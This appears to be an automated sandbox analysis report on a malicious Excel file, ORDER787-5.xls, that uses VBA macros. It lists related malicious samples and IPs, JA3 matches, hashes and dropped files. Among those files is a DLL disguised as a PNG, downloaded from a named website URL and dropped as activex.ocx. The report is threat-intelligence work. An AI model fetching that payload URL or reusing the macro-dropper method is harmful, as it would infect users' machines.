              AS-26496-GO-DADDY-COM-LLCUSorder.exeGet hashmaliciousBrowse
              • 43.255.154.95
              Nuevo pedido.exeGet hashmaliciousBrowse
              • 184.168.131.241
              R900071030.exeGet hashmaliciousBrowse
              • 184.168.131.241
              Nuevo pedido.exeGet hashmaliciousBrowse
              • 184.168.131.241
              https://da930.infusion-links.com/api/v1/click/5782635710906368/4861645707411456Get hashmaliciousBrowse
              • 50.62.139.118
              SecuriteInfo.com.Variant.Razy.820883.21352.exeGet hashmaliciousBrowse
              • 182.50.151.32
              Nuevo orden pdf.exeGet hashmaliciousBrowse
              • 184.168.131.241
              https://bitly.com/2Xaw8VAGet hashmaliciousBrowse
              • 50.63.41.1
              bbva confirming Aviso de pago EUR5780020210104.exeGet hashmaliciousBrowse
              • 64.202.184.79
              QUOTATION REQUEST.exeGet hashmaliciousBrowse
              • 184.168.131.241
              bbva confirming Aviso de pago EUR5780020210104.exeGet hashmaliciousBrowse
              • 64.202.184.79
              bbva confirming Aviso de pago EUR5780020210104.exeGet hashmaliciousBrowse
              • 64.202.184.79
              DEBIT NOTE_ PZU000147200.exeGet hashmaliciousBrowse
              • 192.169.223.13
              2021 Additional Agreement.exeGet hashmaliciousBrowse
              • 184.168.131.241
              rib.exeGet hashmaliciousBrowse
              • 198.71.233.109
              TN22020000560175.exeGet hashmaliciousBrowse
              • 184.168.131.241
              V-0093717.docGet hashmaliciousBrowse
              • 23.229.235.131
              messaggio 2912.docGet hashmaliciousBrowse
              • 166.62.28.86
              Rfq_Catalog.exeGet hashmaliciousBrowse
              • 198.71.232.3
              P.O-45.exeGet hashmaliciousBrowse
              • 107.180.50.162

              JA3 Fingerprints

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              7dcce5b76c8b17472d024758970a406bSecuriteInfo.com.VB.Trojan.Valyria.798.25424.xlsGet hashmaliciousBrowse
              • 160.153.76.195
              SecuriteInfo.com.VB.Trojan.Valyria.798.25424.xlsGet hashmaliciousBrowse
              • 160.153.76.195
              Documentation__EG382U8V.docGet hashmaliciousBrowse
              • 160.153.76.195
              Documentation__EG382U8V.docGet hashmaliciousBrowse
              • 160.153.76.195
              5813 Filename.docxGet hashmaliciousBrowse
              • 160.153.76.195
              5813 Filename.docxGet hashmaliciousBrowse
              • 160.153.76.195
              Recibo de pago.xlsGet hashmaliciousBrowse
              • 160.153.76.195
              Verification Report of Interface utilization cannot be correctly get by ....docxGet hashmaliciousBrowse
              • 160.153.76.195
              Pago Fecha 2021.xlsGet hashmaliciousBrowse
              • 160.153.76.195
              Statement_1472621419.xlsGet hashmaliciousBrowse
              • 160.153.76.195
              Statement_1472621419.xlsGet hashmaliciousBrowse
              • 160.153.76.195
              Curriculo Laura Sperandio (ps).xlsmGet hashmaliciousBrowse
              • 160.153.76.195
              SecuriteInfo.com.VB.Heur.EmoDldr.32.60562790.Gen.23503.docGet hashmaliciousBrowse
              • 160.153.76.195
              SecuriteInfo.com.VB.Heur.EmoDldr.32.D69B7850.Gen.24453.docGet hashmaliciousBrowse
              • 160.153.76.195
              SecuriteInfo.com.VB.Heur.EmoDldr.32.92AE33C6.Gen.14319.docGet hashmaliciousBrowse
              • 160.153.76.195
              SecuriteInfo.com.VB.Heur.EmoDldr.32.60562790.Gen.23503.docGet hashmaliciousBrowse
              • 160.153.76.195
              SecuriteInfo.com.VB.Heur.EmoDldr.32.D69B7850.Gen.24453.docGet hashmaliciousBrowse
              • 160.153.76.195
              SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.docGet hashmaliciousBrowse
              • 160.153.76.195
              SecuriteInfo.com.VB.Heur.EmoDldr.32.92AE33C6.Gen.14319.docGet hashmaliciousBrowse
              • 160.153.76.195
              SecuriteInfo.com.VB.Heur.EmoDldr.32.A0B4C65C.Gen.18253.docGet hashmaliciousBrowse
              • 160.153.76.195

              Dropped Files

              No context

              Created / dropped Files

              C:\ProgramData\activex.ocx
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):327680
              Entropy (8bit):7.594344556420887
              Encrypted:false
              SSDEEP:6144:TkgbkwkCOtK/0C74zwkF1vjA77XR/RYvetp:T/bgCO8SzwkF1vUDXYvetp
              MD5:1A57412AB2EDD77103FD75768BA146DD
              SHA1:81599A9B526C16B2A0A82CADCB8ACAAC6781EC81
              SHA-256:7AB75BC888C6DD0457098D4539D9C86C3F1358A3B0C1A262F2BB8287E2BAC917
              SHA-512:7679B32035D95E5563EAD9D54D8EF810C20913DA702D983A23C66FC51E9F00647556BEE2BA48803BD13B1340744C78AAEA835BB9C247E616480595043DE9566A
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 15%
              Reputation:low
              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........9.zj.zj.zj.}.j.zj.}.j..zj3.'j..zj.{j..zj.}.j..zj.}.j.zj.}.j.zj.}.j.zjRich.zj........PE..L......_...........!.................-....................................... ......k-..............................06..P..../..<........|...........................................................%..@...............(............................text............................... ..`.rdata...6.......@..................@..@.data...<6...@... ...@..............@....rsrc....|...........`..............@..@.reloc........... ..................@..B........................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
              Category:dropped
              Size (bytes):58936
              Entropy (8bit):7.994797855729196
              Encrypted:true
              SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
              MD5:E4F1E21910443409E81E5B55DC8DE774
              SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
              SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
              SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
              Malicious:false
              Reputation:high, very likely benign file
              Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):326
              Entropy (8bit):3.1104823335779463
              Encrypted:false
              SSDEEP:6:kKekMSwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:lWkPlE99SNxAhUegeT2
              MD5:88D01B15C32DC5F54651F0A97864E0EF
              SHA1:1396AB210AF8B93B30E8A46FBB83DAE780B84B11
              SHA-256:AD6121D0521AEAE4EFA83923B306C43A8EA2B74184AE0C898F6BACB4B8046702
              SHA-512:0CEA566ADBCA3DE2C4AA21799DD19B9B755A7B355953144BDB20BFF927B81E897EB3A4EEFAAA7E57D94EB9D361BC45FADA0669EFA346FEFF4F8B0E248C0C5C8C
              Malicious:false
              Reputation:low
              Preview: p...... ........oO.....(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\apperolew[1].png
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Category:downloaded
              Size (bytes):327680
              Entropy (8bit):7.594344556420887
              Encrypted:false
              SSDEEP:6144:TkgbkwkCOtK/0C74zwkF1vjA77XR/RYvetp:T/bgCO8SzwkF1vUDXYvetp
              MD5:1A57412AB2EDD77103FD75768BA146DD
              SHA1:81599A9B526C16B2A0A82CADCB8ACAAC6781EC81
              SHA-256:7AB75BC888C6DD0457098D4539D9C86C3F1358A3B0C1A262F2BB8287E2BAC917
              SHA-512:7679B32035D95E5563EAD9D54D8EF810C20913DA702D983A23C66FC51E9F00647556BEE2BA48803BD13B1340744C78AAEA835BB9C247E616480595043DE9566A
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 15%
              Reputation:low
              IE Cache URL:https://www.penrithdentalimplants.com.au/ls/apperolew.png
              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........9.zj.zj.zj.}.j.zj.}.j..zj3.'j..zj.{j..zj.}.j..zj.}.j.zj.}.j.zj.}.j.zjRich.zj........PE..L......_...........!.................-....................................... ......k-..............................06..P..../..<........|...........................................................%..@...............(............................text............................... ..`.rdata...6.......@..................@..@.data...<6...@... ...@..............@....rsrc....|...........`..............@..@.reloc........... ..................@..B........................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7FBD1845.emf
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
              Category:dropped
              Size (bytes):2128
              Entropy (8bit):2.131067658554214
              Encrypted:false
              SSDEEP:24:YW7VoaaP0yGLCfVxwj4LoFjh0JtxlggL0lue:NPazfVxwji5Ax
              MD5:A4CD320321FB7CB36DCDBE18372DB7F6
              SHA1:2214C8B629049D3FCAA14F59636C884A4A2AC765
              SHA-256:382EFF7970B1157CA3CC1DE889E7BBC92BA06E2E9992FFB1E515C27C5B914EC2
              SHA-512:395C094254E8B9E076527D452AC039397F5ACAB0171DBA7338F4571D33771124585FDDDBB35AEDDDB0A022BC9626DBFF761850E41AEBFE0CC25CBD0CE308CA6A
              Malicious:false
              Reputation:low
              Preview: ....l................................... EMF....P...+.......................8...X....................?......F...........GDIC................................................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!...........................................-.........!.........................$.............................-.......................................$.............................-...............'.......'.....................................................................................!.......!.......'.......................%...........L...d...................................!..............?...........?................................L...d...................................!..............?...........?................................'.......................%...........
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E3592917.emf
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
              Category:dropped
              Size (bytes):2128
              Entropy (8bit):2.077588804474407
              Encrypted:false
              SSDEEP:24:Ywl/V3uaP0z4GmXIfzCsf3dte3YLaFnuOlehywoy/://QaRYfGi3do3l8
              MD5:D2F8C79A51EC1F551B9233C6FD1083EA
              SHA1:73FB2CA087FB85B595A981D499ACB31C156BB71C
              SHA-256:5C748A589C0EEA58A5664F62DD15E3B06CC436A8E5A30918F881793A8743379B
              SHA-512:341687BE2080E7BA0E6D778A4C013D1742745D294D94FAED19626BF4C050048D0C0D47D838D1F7092985D3873D63CC8B78A74F6569F8D299DF82159E79581E19
              Malicious:false
              Reputation:low
              Preview: ....l................................... EMF....P...+...........................@...........................F...........GDIC................................................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!...........................................-.........!.........................$.............................-.......................................$.............................-...............'.......'.....................................................................................!.......!.......'.......................%...........L...d...................................!..............?...........?................................L...d...................................!..............?...........?................................'.......................%...........
              C:\Users\user\AppData\Local\Temp\CabF73B.tmp
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
              Category:dropped
              Size (bytes):58936
              Entropy (8bit):7.994797855729196
              Encrypted:true
              SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
              MD5:E4F1E21910443409E81E5B55DC8DE774
              SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
              SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
              SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
              Malicious:false
              Reputation:high, very likely benign file
              Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
              C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):241332
              Entropy (8bit):4.206848634864182
              Encrypted:false
              SSDEEP:1536:cGILEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:cdNNSk8DtKBrpb2vxrOpprf/nVq
              MD5:93F2225BF5FFD6C4E480793CA89F0CBB
              SHA1:901730BE002933D11806C6417D1B35C794AFB953
              SHA-256:968744AFB8FBEE61678CD949E38D7B4AC80073A40A90CC1E865C56621F0A925D
              SHA-512:F01FAEBCEDD8D7C3B4C8404387A3BEF66E95853ECDCCFDE641261A32CC12C22C81D810E3E2FB161099756F64462C3B9DBC35733C55C9A3D84E5C81FBDBC35EBD
              Malicious:false
              Reputation:low
              Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................H...4............................................................................x...I..............T............ ..P........................... ...........................................................&!..............................................................................................
              C:\Users\user\AppData\Local\Temp\FEEE0000
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):148333
              Entropy (8bit):7.862613200850918
              Encrypted:false
              SSDEEP:3072:/wW92ouB+ctexrUW/HlaLuZl4KKB/BtVhdoMOmLtlbTy:/ZxuZexI0lSh/BbhdoMOmK
              MD5:F172F8A0B25CB105FD588B810003BE34
              SHA1:A8317748F41F50D28FCCCC7CA11C74DC524D67D2
              SHA-256:E011EC839076E4F99839C495FA3B3BD70246EBF39B593724DA51B1E314263A0D
              SHA-512:5E004E3F06C46A17F4904344AECB42E7C030D1166D31AF0D904730ED689FDECA1F87A00B808D01B9E4C901BD9C4CBD35713EE77576E493BB7950455C88045D66
              Malicious:false
              Reputation:low
              Preview: ...n.0.E.......D'..(,g..6@R.[......8..w(9n.....u..\.3.F...>HkJrU.H..[!M]..._.O$.....5P.#.r.y.n.xt.2T.P.]..3...@.PX..W*.5.x.k......j..rk".....l.P.'.....w.l.!..*.sNI."&J.F\@r[U....Ic."8.L..@.p^".?@.XX ...L}..:..+@W..&O+...*\.&Js.w.*...N..... ..a.u.Q......N.}..K..=......Q......}1.e..C.A..6..qo...*.5&......V.h{.Z...^.../....b^...#r.?Qn.#......x.m..`.G.a.......:E.1..!b..y....Ct.*......h!w.=...Gy...t.S...n..'.Dio.....b.........s..../.>.s...G..~....D.$....... z...._.......PK..........!.8......5.......[Content_Types].xml ...(..............................................................................................................................................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\AppData\Local\Temp\TarF73C.tmp
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):152533
              Entropy (8bit):6.31602258454967
              Encrypted:false
              SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
              MD5:D0682A3C344DFC62FB18D5A539F81F61
              SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
              SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
              SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Jan 5 20:00:46 2021, atime=Tue Jan 5 20:00:46 2021, length=8192, window=hide
              Category:dropped
              Size (bytes):867
              Entropy (8bit):4.496574117992861
              Encrypted:false
              SSDEEP:12:85QhenCLgXg/XAlCPCHaXtB8XzB/lzUX+WnicvbsW1bDtZ3YilMMEpxRljKHTdJU:85vU/XTd6jHUYe7Dv3qWrNru/
              MD5:F477EDF49DB8F29FA1F7E8563873054A
              SHA1:C39AC7E0ACF6C289AD7EE4FDC23C4D2E3778C550
              SHA-256:3232C9EC5CC69786EEB55B4CA42C340AB196433A6F9D10B69104223F03C9FE55
              SHA-512:8A43D696AE55466F73669264D320BAD18A4AB8A0DB0BCDC2ED7F446BC377FCB664B9EB300293E7835CD48B0118F9EECF727E10F1271B7BD3525985AA040E4474
              Malicious:false
              Preview: L..................F...........7G................. ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....%R....Desktop.d......QK.X%R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\813435\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......813435..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\ORDER787-5.LNK
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Tue Jan 5 20:00:46 2021, atime=Tue Jan 5 20:00:46 2021, length=169984, window=hide
              Category:dropped
              Size (bytes):4056
              Entropy (8bit):4.528803921190274
              Encrypted:false
              SSDEEP:96:8TW/XojFrsgKWQh2TW/XojFrsgKWQh2TW/XojFrsgKWQh2TW/XojFrsgKWQ/:8bjFwg7QEbjFwg7QEbjFwg7QEbjFwg7g
              MD5:BE347C89A9A76E5DF8F2035AF09871FF
              SHA1:A5D5164AB3B388822846783B1D4543BA19C788C5
              SHA-256:9F0967ED9573F54FB9A4EFFF1208E6DC8DF58792191F759F7B4BDBD5A3ADC0FF
              SHA-512:8FF4F2D97F45401FF6F53E48B1A2C56099DC71BD38BB386E7DAE90B77C9DA33A96D3FDF0905FC1687DDA31A88B4C5DE15E73270992E1CD4F63324A7B8870AFC6
              Malicious:false
              Preview: L..................F.... ......{..........S..................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2.....%R.. .ORDER7~1.XLS..J.......Q.y.Q.y*...8.....................O.R.D.E.R.7.8.7.-.5...x.l.s.......x...............-...8...[............?J......C:\Users\..#...................\\813435\Users.user\Desktop\ORDER787-5.xls.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.O.R.D.E.R.7.8.7.-.5...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......813435..........D_....3N...W...9F.C...........[D_....3N...W...9F.C..
              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:ASCII text, with CRLF line terminators
              Category:modified
              Size (bytes):169
              Entropy (8bit):4.42743505414388
              Encrypted:false
              SSDEEP:3:oyBVomMkQurYCyG3urYCmMkQurYCyG3urYCmMkQurYCyG3urYCmMkQurYCv:dj6kQZC3ZUkQZC3ZUkQZC3ZUkQZs
              MD5:4232FA4840865D1AC196D3F04B274801
              SHA1:BB30CFD9644E02C3A4766006AC5DDDD11684B15F
              SHA-256:D10AC2C8001288BBB4AD0E1A10572DEC3E549158FDDC2042084613941D17ACD7
              SHA-512:7ADAAF43B2E7CA5E4578B1E7F16F219CD331A50190036490FFEDA1B30E44F656D61C4848ABA6F5DD5EA365F63C346254872F6E54FD6D531394992A9954F69B18
              Malicious:false
              Preview: Desktop.LNK=0..[xls]..ORDER787-5.LNK=0..ORDER787-5.LNK=0..[xls]..ORDER787-5.LNK=0..ORDER787-5.LNK=0..[xls]..ORDER787-5.LNK=0..ORDER787-5.LNK=0..[xls]..ORDER787-5.LNK=0..

              Static File Info

              General

              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Jan 4 17:53:11 2021, Security: 1
              Entropy (8bit):7.881888506863549
              TrID:
              • Microsoft Excel sheet (30009/1) 78.94%
              • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
              File name:ORDER787-5.xls
              File size:165376
              MD5:1d97c6cb50c4107498e4f0e76f539f0c
              SHA1:a4dc090837c76aed324bea19c9f62e2d47bb7bc8
              SHA256:1b761a682092f8be6c7e9eef709be08a7105159a5e4ffb7722b0530fba308ba4
              SHA512:08c580cbb19b3684f96ab82ec358ca42b796d52045c71d7f794f91d745b62f184d0b1c6842dd6577fb2a0b762bd236f1d1d593b3c592767788fda08739b025a3
              SSDEEP:3072:6D/0mXgqPYJJv0Cl04gsDDNEnRL/WL018klfOPxHfoVsfMJETA24CLjmbzafPRj:6z/PE2hyDJEBW6plWPGi4ENmbza3
              File Content Preview:........................>.......................................................c..............................................................................................................................................................................

              File Icon

              Icon Hash:e4eea286a4b4bcb4

              Static OLE Info

              General

              Document Type:OLE
              Number of OLE Files:1

              OLE File "ORDER787-5.xls"

              Indicators

              Has Summary Info:True
              Application Name:Microsoft Excel
              Encrypted Document:True
              Contains Word Document Stream:False
              Contains Workbook/Book Stream:True
              Contains PowerPoint Document Stream:False
              Contains Visio Document Stream:False
              Contains ObjectPool Stream:
              Flash Objects Count:
              Contains VBA Macros:True

              Summary

              Code Page:1251
              Author:
              Last Saved By:
              Create Time:2006-09-16 00:00:00
              Last Saved Time:2021-01-04 17:53:11
              Creating Application:Microsoft Excel
              Security:1

              Document Summary

              Document Code Page:1251
              Thumbnail Scaling Desired:False
              Contains Dirty Links:False
              Shared Document:False
              Changed Hyperlinks:False
              Application Version:983040

              Streams

              Stream Path: \x1CompObj, File Type: data, Stream Size: 102
              General
              Stream Path:\x1CompObj
              File Type:data
              Stream Size:102
              Entropy:4.1769286656
              Base64 Encoded:True
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M i c r o s o f t E x c e l 2 0 0 3 . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 1a 00 00 00 cb e8 f1 f2 20 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 280
              General
              Stream Path:\x5DocumentSummaryInformation
              File Type:data
              Stream Size:280
              Entropy:3.26288952551
              Base64 Encoded:False
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . d a t a 2 . . . . . D i g i t a l S e c u r e . . . . . d a t a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
              Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a6 00 00 00 02 00 00 00 e3 04 00 00
              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
              General
              Stream Path:\x5SummaryInformation
              File Type:data
              Stream Size:200
